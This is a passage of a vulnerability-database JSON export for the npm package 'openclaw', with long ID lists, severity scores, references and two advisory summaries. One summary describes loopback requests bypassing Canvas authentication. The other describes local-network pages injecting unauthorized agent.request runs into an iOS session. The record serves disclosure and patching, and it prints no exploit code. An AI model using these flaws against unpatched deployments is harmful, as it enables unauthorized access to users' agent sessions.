vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["CVE-2026-35618","GHSA-cg6c-q2hx-69h7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v1bp-hw9a-yffz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91274?format=json","vulnerability_id":"VCID-v91b-1nmx-ckcx","summary":"OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n## Summary\nBefore `v2026.3.23`, Canvas and A2UI loopback requests could bypass Canvas bearer-or-capability authentication because `authorizeCanvasRequest(...)` treated `isLocalDirectRequest(...)` as an unconditional allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `src/gateway/server/http-auth.ts`. `authorizeCanvasRequest(...)` returned `{ ok: true }` for local-direct requests before checking bearer authentication or an active node canvas capability, which meant unauthenticated loopback Canvas HTTP and WebSocket requests could succeed.\n\n## Fix Commit(s)\n- `d5dc6b6573ae489bc7e5651090f4767b93537c9e` — `fix(gateway): require auth for canvas routes`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server/http-auth.ts` no longer contains the local-direct early return in `authorizeCanvasRequest(...)`.\n- `src/gateway/server.canvas-auth.test.ts` adds the regression test `denies canvas HTTP/WS on loopback without bearer or capability by default`.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35634","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10198","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10235","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10214","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35634"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35634"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"},{"reference_url":"https://github.com/advisories/GHSA-6mqc-jqh6-x8fc","reference_id":"GHSA-6mqc-jqh6-x8fc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6mqc-jqh6-x8fc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110761?format=json","purl":"pkg:npm/openclaw@2026.3.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"}],"aliases":["CVE-2026-35634","GHSA-6mqc-jqh6-x8fc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v91b-1nmx-ckcx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89840?format=json","vulnerability_id":"VCID-v9cd-65tf-p3f8","summary":"OpenClaw: iOS A2UI bridge trusted generic local-network pages for agent.request dispatch\n## Summary\nBefore OpenClaw 2026.4.2, the iOS A2UI bridge treated generic local-network pages as trusted bridge origins. A page loaded from a local-network or tailnet host could trigger agent.request dispatch without the stricter trusted-canvas origin check.\n\n## Impact\nA loaded attacker-controlled page could inject unauthorized non-owner agent.request runs into the active iOS node session, polluting session state and consuming budget. The demonstrated impact did not include owner-only actions or arbitrary host execution.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.1\n- Patched versions: >= 2026.4.2\n- Latest published npm version: 2026.4.1\n\n## Fix Commit(s)\n49d08382a90f71dabe2877b3f6729ad85f808d57 — restrict A2UI action dispatch to trusted canvas URLs\n\n## Release Process Note\nThe fix is present on main and is staged for OpenClaw 2026.4.2. Publish this advisory after the 2026.4.2 npm release is live.\n\nThanks [@nexrin](https://github.com/nexrin) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41398","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00689","published_at":"2026-06-06T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00688","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41398"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41398","reference_id":"CVE-2026-41398","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41398"},{"reference_url":"https://github.com/advisories/GHSA-4p4f-fc8q-84m3","reference_id":"GHSA-4p4f-fc8q-84m3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4p4f-fc8q-84m3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"